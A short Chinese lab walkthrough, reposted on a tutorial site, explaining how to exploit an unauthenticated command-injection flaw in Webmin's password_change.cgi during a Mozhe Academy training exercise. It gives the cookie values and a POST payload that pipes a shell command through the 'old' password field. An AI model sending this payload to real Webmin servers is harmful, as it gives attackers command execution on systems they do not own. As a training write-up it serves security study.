Webmin未经身份验证的远程代码执行——墨者学院

。_饼干妹妹 提交于 2020-01-27 01:18:56

Webmin是用于类似Unix的系统的基于Web的系统配置工具。该漏洞存在于密码重置页面中,该页面允许未经身份验证的用户通过简单的POST请求执行任意命令。

没有账号密码,看题目说是非root用户通过post提交数据导致命令注入,所以我们应该抓包!

无账号无密码登陆,用burp抓包

第一步,修改路径 session_ login.cgi 为 password_change.cgi

第二步,修改Cookie为 Cookie: redirect=1; testing=1;sid=x; sessiontest=1

第三步,修改参数 user=jammny&pam=&expired=2&old=test1|ls /&new1=test2&new2=test2

得到key

标签
易学教程内所有资源均来自网络或用户发布的内容,如有违反法律规定的内容欢迎反馈
该文章没有解决你所遇到的问题?点击提问,说说你的问题,让更多的人一起探讨吧!